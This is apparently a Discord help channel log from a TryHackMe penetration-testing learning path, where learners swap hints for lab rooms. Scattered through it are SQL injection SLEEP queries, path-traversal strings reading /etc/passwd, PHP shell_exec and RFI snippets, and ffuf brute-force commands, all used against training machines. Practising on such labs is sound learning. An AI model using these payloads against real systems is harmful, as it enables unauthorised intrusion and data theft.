#junior-pentester-path
1 messages · Page 14 of 1
That's a whole nother can of worms
Probably was. Infosec peeps don't usually know much about windows for some reason
Right?
got a fatal error
So does everyone else
How fast is normal to get through the path?
||maybe needed using the exec or system||
yikes
how could I mess this up
||<?php shell_exec("hostname"); ?>||
VkVoTmUxTlRValpmVFVGVFZFVlNmUT09 is this text encoded with something?
Doesn't look like it to me but idk
thanks, got it
Gave +1 Rep to @steel nymph
and thanks @drifting drum because you were the one writing it :)
god bless you:))
Hello every one
I need help with the file inclusion room in the Jr Penetration Tester path
I want a direction for task 8 Q 3
anyone solved the sql injection lab?
Yes it works, thank you
Gave +1 Rep to @steel nymph
Thank you bro
I had forgotten this
their hint was not explicit enough to solve it
so, you see how it took 5 seconds to respond? that means "sqli_" is part of the name of the database
you just have to add letters/numbers before the % and if you get a 5second wait, that's the correct letter/number
but I cant get more of it
no other letter after the _ gave you a 5sec wait?
hmmm.
Can I DM you?
sure
I'm stuck on Lab3 I got the file to be displayed but in the wrong format apparently
Hey um if you are lets say saving the results from ffuf to a txt file you just add -o example.txt right?
u can do " | tee file.txt "
Doesn't seem like it worked
I'm not sure how that works, but if you can't get it to work and the results are short enough (like for Authentication Bypass) you can just create the .txt file manually
well on task two (authentication bypass) it said i needed to save the results in a txt, so i looked at the git and it seemed like the -o option should do the job. i see the txt file, but then i go to task 3 and i didn't get a username/pass
i did use the copy paste command and i checked the ip, so i thought maybe the -o option was not right or smth
If the .txt was created and the contents of the file look correct to you then it should be all good. A lot of people were struggling with getting task 3 to work though and some found that creating the file manually fixed the issue.
well i dont know how its supposed to look, but to check the contents i should use the cat command right?
Need some help on SQLi task 8, I have the schema and the table but when it comes down to column name I can't find anything
Does my query look good,
admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = 'xxxxx' and TABLE_NAME='xxxxx' and COLUMN_NAME like 'a%';
It's pretty much the same as the prior example
The cat command should work, it is just supposed to store the 4 usernames that you got from task 2
It's exactly the same steps but you're using the sleep input to validate your inputs
yeah im seeing like words, command line, bla bla, all kinds of gibberish for some reason. Ill check the old messages, much love man, thanks!
Gave +1 Rep to @vagrant charm
No worries, hope you get it figured out
I am sure i got the right table but i can't get a single delay in column name
You can always search this chat to see what fixes worked for other people because as I said, this is quite a common area to have difficulties with
What is your query right now?
Yeah im looking at it right now, going to dig the old messages haha
i'll DM you my full query
Time Based SQLi is driving me insane
Look at the boolean room again. It's pretty much the same with a different method of confirming successful inputs
Ive been messing with it...at this point Im lost lol
Maybe try again another time
I probably should have kept track of what Ive tried
can someone help me? i can't come up with an easy solution
Official Vulnerabilities 101 Room Task 4 2 question:
Who is the author of Exploit-DB? i am too stupid to find the answer Y_Y
I hate my life. Got root on a box only for it to immediately go down :(
Owner of OSCP exam ๐
I have it, thanks
Gave +1 Rep to @winter perch
Which room?
Introduction to web hacking, Walking on application, task3
The answer is in the text, if I do not find something I read it again slowly very carefully ^^
hello guys, my friend has never played CTF. If he creates an account, does the path for the ticket event and gets lucky enough to win the OSCP, is it valid? I don't want him to waste his time
Bro the OSCP vouchers are gone by now lol
OSCP Voucher
Worth $1000 Each
0/2 Claimed
it has to be updated manually so more than likely that is not accurate
does anyone already have eJPT vouchers? i have 2 flags, i am only missing one X-X
ah k
Yea. Really good chance that everything has been claimed already
if it should be so then no chances for the noobs haha
Yep pretty much
and if not then i hope i get my 3rd ticket
Probably shouldn't be doing OSCP anytime soon in that case anyways lol
i got my 2nd ticket yesterday at 1 or 2 in the morning
if the prize no longer existed i think i would not have gotten it
yes i thought so too but if you need it you save money
Yeah same and then I realized the more savvy folk already sniped em
can any help me i'm at SSRF example task2
You're gonna need to give more info than that
Can a mod like, pin this to the channel or something? I feel like I have to say this every time someone asks for help
ooohkkk
@drifting drum ||sometimes just hiding in plain sight ||
Can someone help me ? Please SSRF ROOM Task 2
What user is this application running as? (OS Command Injection). Need help to find this
||check level 4 and try to get the pattern from there||
Sure sir, I'll try it
No sir, I didn't get it
anyone?
I am also waiting for help
I'm trying to get the flag2 for the playground lab using the admin cookie but need help on additional cmds --- got it
Netsec challenge at Port 8080 not working... Can anybody tell me what I am missing? I tried a stealth scan with -T5
What are the contents of the flag located in /home/tryhackme/flag.txt? (Command Injection). Need help to find this
ever heard of cat?
file inclusion task 8 flag 1 and 3 help needed please
Yes Sir, I used that but not working
Flag 1 use post and curl burp seem to have issues
i am trying to connect with telnet and i am getting this error, need help please.
It was strange for me too... So I got the flag from the browser. I am curious... Why was flag.thm not viewable in the terminal...
any help on sqli task 8?
I'm on level 4 trying to run the command they give, however it doesn't sleep.
||referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--||
Have you read the challenge? It explains when it will sleep and when it won't. This is sqli manual enumeration. It will take lots of tries to find full names and columns
I started guessing like half of the alphabet but then saw this example so thought it's starting with u
It was a nice challenge... Repeat the Boolean task... With sleep... I coded a python script for this challenge
ok I got it tnx
yeah I got that
Ngl, I am not a noob... But there's a ton of shit I learnt from this path
btw how do I get the subscriber role?
Subscribe to thm on site... The bot updates ur role here
cool
Can anybody help me with the net sec challenge on 8080? it seems buggy, it's not running even on the attackbox. been on this for like an hour now
.
What are you running on that port?
Nmap
What command are you running exactly?
sudo nmap -sS -T5 -vv ip
One issue here is that you are running with T5 which can miss ports because it is running too fast. try :
nmap -sC -sV {IP} (This will run on top 1000ports and use default scripts and enumerate versions)
Then try with -p- (This will do all ports {WILL TAKE TIME})
Ye, like Cyber said, it's better to use -T4.
Ok I'll look into it
It's showing 100% detected
Oh you are doing that part
Yess
^
Now added
Only add that flag
Lol back to 100%
Command: nmap -sS ip
I even used --scanflags option... It got no change
How long is your scan taking to run and are you resetting the tester?
13.35 seconds
Yes
This is the capstone one right? I'm going to boot it up
Getting the flag by hacking the course code and using cyberchef to decode the base64 is technically not cheating, as it is still a learnt hack right? hahaha
Guys any help with lfi task 8
Im stuck in here
I tried burp to modify request but nothing happend
hello need some help
on xss task 8
i dont know what to do
Gonna need more info than that
i have started an nc listener
and created 1 ticket as shown in guide
but i dont know how to send the request to Request Catcher
You send the ticket to request catcher by supplying the IP of the catcher. However, since you have netcat setup, why not send the request to netcat on that host you are (assuming it's the attackbox)?
are ONE and TWO but different ways of doing it?
i am not using attackbox i am connected with vpn
so should i pass ip of Request Catcher ?
Guys, I am literally pulling my hair out because of this shitty task. I've tried every single technique with cronjobs (I've never faced a problem while doing other machines with cronjobs). So what's wrong?
Q.1 Yes
Q.2 You can just use your tun0 address (That is your IP on the THM network)
i have passed my tun0 ip with my listening port but nothing is happening
What isn't working? Is it not executing your script? I haven't done this yet but it seems straight forward, in that I might be able to see what you are doing wrong.
Are you catching on the port that you are specifying in the request to connect to? (you must supply a port and not just an IP)
I know it is straight forward, i've edited the script which is located at |/home/karen| to a simple reverse shell, and open a listener on my machine for nearly 10 mins but nothing appears
How often does the cron job run?
yes
my nc: nc -nlvp 8888
my req url:http://{myTUN0ip}:8888
1 min
Perhaps there is a permissions issue. Is the script executable?
Can you ping the machine? (want to check connectivity)
If nothing works, try the attackbox
First it was not (i've never made it executable though), then i thought of making it executable but nothing works. people in the forum post suffer from the same problem
I'll give it one last try
yes
for Request Catcher i just need to pass ip without port?
thanks letme try
Gave +1 Rep to @fleet horizon
Stuck on fileinc as a whole
been trying anything I can think of
any hints would be appreciated
Im stuck on the fourth if you could help
4th one is easy
follow task 6 for last one
I got the output, just don't know how to do the answer
pretty sure i worked it out
got it :)
Hi
I am stuck at file inclusion task 4 question 1
I can read the file
But I can't get the url format to answer
|| Developer tools will help ||
Hint in that box
The question is lab#1 try to read /etc/passwd .what would the request url be
I can't figure out the url
Look in the spoiler I gave you
Gives the hint on the way I at least got the request url
Probably a better way from other people
@modest arch Have you managed to work it out
Nope
I can read the file
Have you read the hint I gave to you
Ya
Dms
Still an issue with Cross-site Scripting Practical Example (Blind XSS) task 8, as i am getting nothing from the cookies and have been on it for about 90 minutes now
use the script shown in the task, and make the backup file executable and wait.
What did you try so far?
File Inclusion room. Task 8 for flag3.
Somebody just give a hint.
a hint would be very helpful.
@wicked fulcrum just try another http method that starts with P
alright. I will try that,.
Does anyone know why File inclusion Challenge 1|| only works with curl? I've tried everything else and can't figure out why it only works like that.||
If it doesn't work, try a trick you saw in task 5 ||%||
hey it worked. Thanks @distant mica
Gave +1 Rep to @distant mica
Can i get a hint for task 8 in File Inclusion
You can use dev tool in your browser then in network tab just right click on your request to edit it and change the HTTP method
Which step ?
There's a hint on the page: You need to send a POST request with the file parameter!
so use curl
yes I think it's the simple way
Hi,
in the room Walking An Application, when i visit the URL : https://LAB_WEB_URL.p.thmlabs.com.
I've this error : 504 Gateway Time-out
I don't understand why. I already managed to go to the site but I turned off the box without doing so on purpose.
You have to start machine
First, the Attack Box, then the machine ?
If you don't use a vpn go with attack box and then machine yes
ok thanks
I feel stupid for not being able to do these challenges
Gonna take a break and come back with a fresh mind to see if that helps
do u think the ejpt is good?
No, have you seen any jobs requiring it?
That doesn't mean it's not good. It's a solid cert if you have no foundations in pentesting. You don't have to get the cert itself (you can if you have $200 spare though). There is some things that are outdated but combining that course with Tryhackme, HTB and other learning sites, should allow you to go for something more useful like the eCPPT or OSCP
^
thanks attackBox worked
Gave +1 Rep to @fleet horizon
Hey all, heads up I'm kind of a noob and doing the Remote File Inclusion lab on Jr Pentest path and I'm trying to serve up a simple Python3 http.server but for some reason it's stuck on "Serving HTTP on 0.0.0.0 port 9001 ..." any advice? Looking on the internet and it seems like I may need to port forward on my router?
That means that it is hosting the server correctly... You will now use wget or curl on your target to download the file. You will be able to download any file that is in the directory you are hosting the webserver at
okay, thanks, I suppose my next question is which IP is my server taking then?
Gave +1 Rep to @fleet horizon
your THM IP. so you would run:
curl http://{IP_OFMACHINE_}:{PORT}/{FILE_TO_DOWNLOAD} -o FILE_NAME.ext
Same command with wget
Much appreciated, I think I was using the wrong IP in my command then! I'll try that
anybody completed file inclusion room?
I need help badly
@prime sundial still typing
I am stuck in task 5 first question
I could access /etc/passwd but the answer I put for the response shows wrong
/lab3.languages../../../../../etc/passwd%00
this is what I tried
if you check, its not languages, u have different one
try to put other numbers and check how ur url should be
it should have the ?file in it
well I did this to match the answer format
?file=languages/../../../../../etc/passwd%00
Lemme try sth ....I will reach u again if I can't still answer
thanks, actually I'm not sure if I want the certs for a job, but mainly for interest
Gave +1 Rep to @fleet horizon
I was thinking about maybe oscp
I thought my server was on my host IP and forgot I was in a VPN. hopefully this serves as a good reminder for everyone to check their ifconfig and tun0 address when you're setting up a listener and not just assume you're listening on your host's IP
It's the one in demand and will get you past the gate keepers, i.e. HR
Hahahahhaa. That would do it
not sure if the job is my main goal since I am a developer in security company
I start to investigate other fields that are not software engineering
If you decide to go that route, make sure you can put a lot of time into it. It's definitely no joke and will take lots of time to study for it. Utilise the resources that are out there and you should be able to do it. If you are completely new, I would recommend 90 days
I have a background from the university in networking and OS (and from my job) and yea I've done some thm in the past
thats why for now I got this paths
anybody could give a nudge for LFI Chall3 please ? ||I absolutely tried almost all kinds of characters escape but couldn't get any single / or even a number||
trying if this is really fits for me
I would jump into that so instead. Would help in terms of interviews
yea def
I read that the oscp is like the entry cert that you need to have
can i DM you ?
however I haven't found anything after it (well maybe CRTO) for red teaming, but not a solid one like oscp
If you're just seeing if you like the field of red team, stick with TryHackMe and at some point try HackTheBox. you can always get OSCP when or if you feel it would help
Am I the only one having an issue with the last flag in Walking an Application?
or am i missing something
doesn't seem to accept it
oh nvm i missed something
anyone can help with LFI challenges?
yeah, im reviewing other people's hints, challenge 2, im trying to change cookie value other than admin, like ../../../etc/flag2
but im not sure if its the real path, or what is the directory i have to look for?
ok
let me try again more
The certs from INE are OK, the certs from TCM are very good, but if you try to use them for gainful employment I think your money and time could be better spent elsewhere
i changed in developers mode METHOD to POST and put IP/challenges/chall1.php?file=../../../../etc/flag1
still seems not working
am i missing smth? i tried with burp, but didnt work aswell
Are you working with lab 1 or lab 2
omg sqlinjection task 8 took me forever haha
is that a question? if it is, its lab1
Hey! Has anyone completed the SQL Injection Room?
yeah I just did after 50 hours
lol
FINALLY DID IT
Need some help with the same, Should I DM you?
CAN'T THANK YOU ENOUGH @steel nymph
Gave +1 Rep to @steel nymph
just ask here ๐ its late for me, so if I fall asleep others may help out
i've the same problem and i took away the curly braces, but it doesn't work
You are close, the post in form and the uri in box
yes I think so, it puts me on an endless list of words
has anyone found a work around for the net sec ids bypass thing?
it stays on 0% but nothing happens
I've run a variety of scans..attackbox and local..
this
when it's over 0%?
like...naturally? or because of scans?
wow
thanks @steel nymph it worked
Gave +1 Rep to @steel nymph
refreshing seems to have made all the difference
the command is :
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}
I've been flipping out because it wasn't working up til now
but now it registered 1% (lmao) and then I ran a scan
and right away got flag
same..I was running everything..then everything f..then everything ff...and I thought how much more sneaky can I go for something intended to be a 5m exercise?
i restarted the machine, I must have made a mistake somewhere
I am stuck with the SQL Injection room. The payload provided in the lab is also not working.
is this early on bc I had a similar issue
i lost the url of the site acmeitsupport ><
as i remember it was .thm
i find it
guys i did post request with curl, still nothing, am i missing?/spoiler curl "http://10.10.236.253/challenges/chall1.php?file=" -X POST
with dev tools, change form to post, and put uri in box, hit include
Oh cool, thanks Iassi was wondering how to do that, saves a google search
Gave +1 Rep to @steel nymph
for winPriEsc:Unquoted Service Path Lab : to search i am using "findstr /si THM flag*.txt" but its not revealing any file name... any help...
from c:\
Hello. I'm a little confused.
Which TCP ping scan does not require a privileged account? Is a SYN, ACK and what? 
can i dm you?
You cannot copy paste that command in task 8, you have to go back to task 7 and use the info there :) it will work, its not broken
i am on it...
I am doing the cross site scripting task 3: Where in a URL is a good place to test for reflected XSS? I have tried a few different answers. I feel like this should be obvious but im not getting it. help?
Thanks. I'll take a look now
Gave +1 Rep to @steel nymph
have it now... thanks...
its part of the url after the '?'
Got it, thanks
Gave +1 Rep to @dull turtle
No way. I can't understand the format of the response.. Expected -PS or SYN. And everything is wrong... May i ask you for help?
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes. In the documentation, these are all ping options. I don't see a four-character one among them..
Nmap Host Discovery Using TCP and UDP
in Nmap Live Host Discovery
I was using burp suite for getting flag1 from task8 of inclusion room
And this is how my input looks:
POST /challenges/chall1.php?file=/etc/flag1 HTTP/1.1
Host: 10.10.147.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.10.147.130/challenges/chall1.php
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
omg. im so stupid
so after forwarding why am I not getting the flag?
This is a language barrier... Thank you for responding and not passing by my request.
Gave +1 Rep to @steel nymph
can anyone help me?
@hard jungle u there?
damn
has the site for the last task in XSS bugged out?
Can I get a hint on how to start going about question 1 Task 8 in File Inclusion
thanks
Gave +1 Rep to @steel nymph
where are you stuck? If you read the other tasks, its all in there
Gonna read task 6 and 7 again to see if that helps any
Yo, I can not get my head around the SSRF room. Anybody mind giving me the example string in task two so I can have an example of how the request is parsed?
I couldn't get this to work with Burp, so I used Dev tools
Linux PrivEsc - 'what linux is this?' wow I cant find what i need in the required format. Any tips please?
hey hi i'm looking for help for the FILE inclusion challenge
marvellous, permission denied
can anyone help me
In task 6
https://tryhackme.com/room/winprivesc
i'm stuck in the second and third challenge
i can help you
can i dm you @steel nymph
thank you!
Gave +1 Rep to @steel nymph
hey guys im stuck at LFI lab, im pretty sure my request is correct but am not getting the right response
What question
and for the rce task on file inclusion, I got a python webserver up, with the file im trying to reach on it, but it cant connect
For task 4 right
for task 8 the challenge
What question
try dev tools to modify to POST
^
am using burp
Hi. Do you have problem with flag1-3?
can i pm someone
@marsh agate Can you give me a hint for the challenge rce one
I got the file and a python webserver up
But I can't get the response on the site what i need
no errors on the my python server
just on the playgrounds site
tried nulling it at the end aswell
are you on a VPN or using a THM box
thm box
for rce, the point is u put ur server's file into url parameter, to make it read ur file
That's what im trying
I have it running in home, and have cmd.txt as the payload
Through playground site, I enter the webserver of the payload and its directory
But i just get can't connect to webserver, failed to open stream and cant open cmd.txt
OH
i've been doing 0.0.0.0
I downloaded the reverse shell, uploaded it to the machine and accessed it using nc. And then I entered any commands on this server.
that explains it
I'm sorry, I have to leave.
It's fine
Can someone link me to a reverse shell for the playground please? DM me or just mention me here so i can see it, thank you in advance
You can fix the page's form and intercept it with Burp Suite to see what the request looks like! This one should be a warm up for the others.
Hi!
In Windows Privesc Room, task 5 dll hijacking, I can't stop nor restart the service, also it seems that my dll can't manage to change the admin pwd, any tips?
I feel stupid for not being able to do this simple RCE
Payload: hostname
Query: http://10.10.x.x:4932/cmd.txt
OH
I've done that a few times already :S
Is the query right however
Did you start your HTTP server on port 4932?
Yup
Fixed the payload and it still isn't working
aaa
||<?php echo gethostname(); ?>||
what is wrong with the payload
Okay
Anyone else have an issue on task 8 of cross-site scripting? I get the cookie and decode it, but the room doesn't accept it. Tried putting in everything and just after the =.
Wait I might know why it didnt work
In an error it says about included paths
If I add that, then go to the webserver it could work maybe
I just realised my mistake after this whole time
What was it? did it work for you?
did you get the shell?
You don't need a shell
dont be, practice makes perfect, better fail now, later u ll succeed
any hint on task 2 ssrf? still not working
Now time to just try get the right php function to call
use pentestmonkey's script
Could anyone give me a helping hand with LFI challenge 3? I have tried so much and im stuck. My curl request now looks like this: curl http://10.10.249.125/challenges///////chall3.php?file=../../../../etc/passwd0 . I also tried to url encode it and have used different HTTP methods.
yes
copy the original url, not after u put //////
I GOT IT
I GOT THE FLAG
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
Any clues?
idk where to start
Clue research how to get hostname in php
Task 6 information helps ALOT
Also lassi, has attackbox been a kinda laggy for you the last few days>
@modest arch hi, i'm stuck too
i seem like cronjob are not working
I am on command injection task 5 practical. Do the inputs that I would do to get the user and flag go in the diagnose IT page or in a terminal session?
ok i'll try that
Thank you very much sir
Gave +1 Rep to @steel nymph
will it show an output or do I need to look at the source to see the output. I have been trying some inputs and the output field has been blank
of course, thanks
Gave +1 Rep to @steel nymph
I am getting results with the example
Thanks, had some other issues, but got it figured out.
Gave +1 Rep to @steel nymph
Thanks
Gave +1 Rep to @steel nymph
thanks cyberlion, got you man
Gave +1 Rep to @smoky oyster
oh ye
lol
thanks @steel nymph for the help
Gave +1 Rep to @steel nymph
Gave +1 Rep to @coarse marsh
is there like a drop rate list for tickets ? hahahah
well, it seems like most of the rooms have had tickets claimed anyway
use this script in backup.sh and chmod +x and wait
it will work
does it have root privs??
yeah
just do it with backup
u there @modest arch
ye
antivirus will work
im here
you just need to change permissions
no output : (
Change the permissions
Have you got a web server going
of my own?
ye
nope
Have you tried reading the file of where that information may be stored?
Spin up a python webserver
python3 -m http.server
Gave +1 Rep to @fleet horizon
If you want we can go dms where I can explain it better
ok
Incase people who read the chat don't want hints
yh lol
Hi im having trouble accessing the xssgi url that is given to me
saying there's a potential security threat and i can't proceed from there..
would anyone be okay to direct me from there
from the blind XSS practical
if i use just http(without secure), gives me a ngnix page
nginx*
You can accept the warning
i did, but gave me a 504 error
It's just because it doesn't have a valid cert
That's a server error. Try rebooting the machine
@steel nymph Yup ! I'm using the attackbox
Thanks Dave! Will give it a spin!
Gave +1 Rep to @fleet horizon
am i the only one getting this
@steel nymph @modest arch Ah. only using the machine IP works. Thanks again!
YEAH! I was getting that too. The work around for that is to launch the attackbox and ssh in. This is happening on every linux privesc task.
Im doing SQL injection task 6, I was able to get the flag but it doesnt seem to be working, is this not the right flag? ||THM{SQL_INJECTION_3840}||
File Inclusion Playground had me stressed
but i made it through
did it work? I had issues with this earlier today
which room?
SQL injection
Copy paste the command you're using
Referrer=admin123' union select sleep(5),2 from analytics where username like 'a%';--
Please help me. Stuck on the challenge at the end of File Inclusion Capture Flag2 at /etc/flag2
http://10.10.209.196/challenges/chall2.php?inc=../../../../etc/flag2
Feel like i have tried everything but can't get it to work
u have to modify cookie
Oh
Admin123 isn't the proper referrer either
I did that part mate, its the flag i cant get to
you have to change the cookie value twice in total to get the flag
It worked to get the table name
keep modifying it. error message will point u ur next step
is that the correct url i was using then?
no
The referrer is fine. You need to look for a different db table. There is more than 1
That too lol
im so confused, the cookies is set to Admin, i thought i got that part right
try changing the cookie and read the error
u did, not still have to modify "admin"
think about where else you could put a file path instead of the parameter in the URL
i see its changing the include file
Ok got it, but the password doesn't want to show...
Anything special?
What do you mean? You have to enumerate a table then a column and finally a row just like the previous question but manually
I enumerated the two Colomns
Now I'm trying to guess the admin password
But I tried all alphanumerics
You are now doing rows right?
Yes
What command are you running?
.... From users where username = 'xxxxx' and password like '%';-- works
Takes 5 seconds
But anything else is instant
This is pissing me off so much
That is because that payload is wrong
You need to enumerate the username first
Do you have one?
I did
Ok... have you tried all numbers too?
I didn't write it so as not to ruin it for others
Yes
0-9
Oh wait
I think I skipped one lol
what error are you currently getting?
i started again, so changed the cookie to admin
now on the page that says This is a admin web page! Get the flag!
do i need to do anything with the url or just the cookies ?
only cookies
change the cookie to something else and read the error
tried:
etc/
/etc
etc/flag2
/flag2
cat /etc/flag2
you still need to use directory traversal
does someone have a hint for me for challenge 3 in the LFI room
I got up to 4 digits but no more digits or alphanumeric
Is it case sensitive?
You should be able to log in now
Unless you have the wrong user
in the inclusion function i dont get rid of the .php and i tried it with the %00 and 0x00
i think so yes
Haha I'm stupid
yes when i use the GET i get in the inclusion function ectflag.php and with POST there is the .php
try to use POST method
Lol I did the same mistake yesterday. I struggle with the whole ssrf module...
now u need to work on not showing .php part
im using burps repeater at the moment but not sure if this is the problem
i did with curl
Nice!
How to get sqli task 8 time based flag?
no rep for me :(
it's because you edited it
thanks @lusty bolt
Gave +1 Rep to @lusty bolt
how do you give reps ?
by thanking others
thanks @lusty bolt
Gave +1 Rep to @lusty bolt
boom
Gave +1 Rep to @lusty bolt
?
What to repeat?
Same as previous task?
Ok let me try
Thanks TryHackMe for putting this path up. Learnt a lot. Completed the path but didn't get lucky apart from gaining knowledge. For that I am thankful.
Yeah thanks @tiny bluff
Gave +1 Rep to @sharp knoll
anyone can help with flag2 from LFI? I already changed the cookies value but I have no clue what to do next
i must say SSRF is not my strong point that took me a while!
With some beer and time
where are you stuck?
I changed the cookie from guest to Admin and a green box appeared
read very carefully. 1st I thought it was Admin, you have to write admin
then catch it with Burp, and change the "Cookie" value to path
oh ok I should be able to get it now, ty
Gave +1 Rep to @ornate yarrow
Of course. You have to do another trick too. Just make error
Do you have any hint for the 3rd task too?
path traversal is the best way, I think
but I'm not a web app fan or File inclusion fanboy
use NullByte and ../../../../etc/flag in Burp
can anyone help me with the Cross-Site Scripting listening problem. I couldn't catch the target.
I did.
file=../../../../etc/flag3%00
tried this one?
when you change request method in Burp you'll see the line, I think
Yea. :D
same
try again, I must say. I got the code that way
Hi, on Authentication Bypass > Task 3 (Brute Force), I have the correct valid_usernames.txt file from Task 2, used the clipboard to paste the command over for accuracy, and got no output in the terminal. I also tried to >> output.txt and confirmed that it's a blank file. Same happens if I update valid_usernames.txt to 4 lines of usernames, with one on each line. Is there perhaps an issue with the command itself that I'm missing?
<?php
echo gethostname();
?>
Am I on the right track with this for the cmd.txt?
Get rid of all the extra junk in your usernames file
You only want the actual usernames themselves
with method 2 it worked
Just an error.
Try doing the same with a POST request
Right, so I tried it with one username per line as I mentioned, and also tried comma-separated all on one line. It's still giving me a blank output.
Ah sorry, I thought you meant it like as shown in your screenshot
Uhh let me take a look at that room again
For me it was one username per line; as far as I remember there were 4, steve, simon, etc.
I did it with POST. :D But just an error
Then try looking at where you should put your payload in the POST request
I did it with curl and dev tools
For etc/flag3, is there any way to strip the .php out when using curl?
Yo, is there a bug in the Cross-site Scripting room? I don't get the request, neither by using curl nor by using the THM request catcher
look up what null bytes are
I couldn't get nc to work for the life of me, the THM request catcher worked after I restarted the machine
Hmm okay, that sounds like I'm doing it right... do you happen to remember if your terminal output looked different from mine? (I'm not sure what a success vs. failure looks like for ffuf, because even when I did Task 2, it's not as if all the usernames popped up right in the terminal; I had to check the output file to figure it out)
Use the THM request catcher
Omg I got it
As far as I remember it was just one line showing me the username and password
But you can also use one command to stop and show when it ends with the correct answer
@winter spade I had the same issue. If you used the output redirector (>) for your ffuf command and put it into valid_usernames.txt, you have to completely delete the file and throw the names in the file, one name on each line.
But how?
I sent it as a POST, tried with different payloads, URL encoded, etc.
I've tried that a few times now, so I'm pretty sure I'm doing something wrong or the room is not working properly. It's more likely to be the first one tbh, but still
Anyone doing command injection?
I used --output success.txt with a curl POST and the -d specifying the file
Wow, this worked, thank you so much!! But what is the point of outputting a file in Task 2 if the file doesn't even work
Gave +1 Rep to @jolly vine
@wary osprey what is your curl? Let's see
I tried in burp
I used it 3 times, but no luck
Ohhh I don't have burp.
Someone smarter than me should answer that lol. I just know it throws a bunch of junk in that file and I tried everything. Deleting the file and manually putting the names into a new one fixed it. Glad it worked for you as well
Hi, anyone able to do the command injection last task?
@wary osprey if you look up in this thread there's the curl command that you can use from your attacker code line
Just following the payload cheatsheet. How do we know which one is to output the flag.txt actually?
Command line
thanks @modest arch !!
Gave +1 Rep to @covert nebula
Thank you, it works with a curl request.
Gave +1 Rep to @unreal folio
Yay! Welcome
don't get what you mean by 'what does the input do'
you mean like cat etc input?
Searches the IP machine for whatever input I enter?
Yup, I mean, I know they are commands.
alrighty! Thanks @steel nymph !
Gave +1 Rep to @steel nymph
I did ' | cd $HOME && ls ' and managed to see some files/directories
Can't seem to find the tryhackme folder. Still trying to dig around
But thanks for the direction. This is fun hahahaha
Gave +1 Rep to @steel nymph
Can't get the flag :(
task 5 from https://tryhackme.com/room/oscommandinjection
i did
I used |id
Same payload not working for the flag :)
@steel nymph thanks, it worked with curl on challenge 3
Gave +1 Rep to @steel nymph
Can anyone help with task 2 of the Authentication Bypass module?
@steel nymph
Does anyone have a problem with Protocols and Servers 2 task 6?
try &
@steel nymph Just a curious question, are we able to download files using command injection as well?
verbose injection for that matter
My hydra or patator didn't work
no idea
& where
holy cow that's sick.
The point is you put your IP address and it pings it, meaning it automatically pings (your input), and if you put & that means it executes your other command too
like ls & pwd
gotcha
remove first part
did
Check flag.txt, I think you misspelled it
Damn, finally, thanks
Gave +1 Rep to @deft valley
welcome!
i miss tokyo from money heist
Anyone else can't get status code 200 at task 11, or is it just me? https://tryhackme.com/room/burpsuiteintruder
is the tryhackme bot down?
I tried numbers from 1-1000
Not from 0? ;)
Anyone also get error 405 "specified method is invalid" for the Playground RFI challenge?
nope
Can I pm you?
Ty!
I restarted the VM, it works now
anybody else finish a room and when you click on a ticket, it just blanks and says "tickets for this room already claimed"?
maybe you clicked too hastily
Check your tickets, they should be there
Yes just had this for File Inclusion
I don't think there's anything to do about it, as I've no idea what tickets I got
I pretty much followed the RFI example, but using gethostname() for Playground. I'm getting a 405 Error Method Not Allowed. Can someone share a hint, or what I'm doing wrong pls
How long is the hydra attack for eddie/quinn supposed to take in the netsecchallenge room?
Stuck on level 4 :)
spoiler
yes?
bruh
It's pretty much the same as the previous level, you're just validating inputs differently
o my bad
Thanks. I ran 2 tasks and they both have been running 20 mins. Tried a few other short SecLists files, but it didn't help
Gave +1 Rep to @steel nymph
But not getting the flag this time around
Has anyone gotten flag1 of the Capstone challenge in the Linux PrivEsc room? I have run many exploits and none have worked. I am able to read files (I have one read exploit working) and have tried to crack hashes to be able to su to a user but still nothing (couldn't crack the hashes).
Thanks again. I got it working. The command looked right, but somehow it attacked IP/PORT instead of IP:PORT
Gave +1 Rep to @steel nymph
I was able to get the root file from another exploit. However, I have tried different privesc methods to get missy.
That is the method I got the root one from. I'll take a look and see if there is another one I can manipulate to get to her account
No. I was able to use that particular exploit method to get sudo reads on files. So, I was able to guess the path to the flag and extract what was contained. Not logged into root
Can I quickly DM. I'm trying to not give much away here
This is the command i use
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "admin=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
@modest arch
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
this is the correct one @pearl compass
do I need to be in a certain directory for it to work? @modest arch
tried many scans but haven't yet found the ftp port
also didn't understand that last challenge
I tried to but it was taking A LOT of time
I'll try again
what exactly is supposed to happen in this one?
let's say I'm able to do that
what then?
does the page just gives me the flag?
okay
Nah, just make sure the wordlist path is correct
thank you, much appreciated @modest arch
Gave +1 Rep to @smoky oyster
You don't have to complete it
And this is the only question I'm left with in this room
Go sleep
I won't be able to
So help me?
I'm not getting any relevant things to get the flag
yeah and then they give an input which I used as you can clearly see in the screenshot
Hint: There are two tables.
I need help with the netsec challenge, IDS evasion
Task 2
I have 50%
yep
||nmap -sS -F --reason MACHINE_IP||
Tried -sW, -sX, -sM, -f and --mtu 8 but not working
Just do it the same way as task 7
Can I DM @steel nymph? Stuck on task 8 SQLi
Hey guys. Task 5 Windows privesc, sc start dllsvc does not start it. What am I missing?
hey there
Guys, with each room I get the info "Tickets for this room already awarded."
What to do?
How do I get back previous tickets?
Privesc Task 9 crontab. Unable to get a revshell, this sucks
Depends on what room you are talking about
I said I would help. You never sent me a screenshot lol
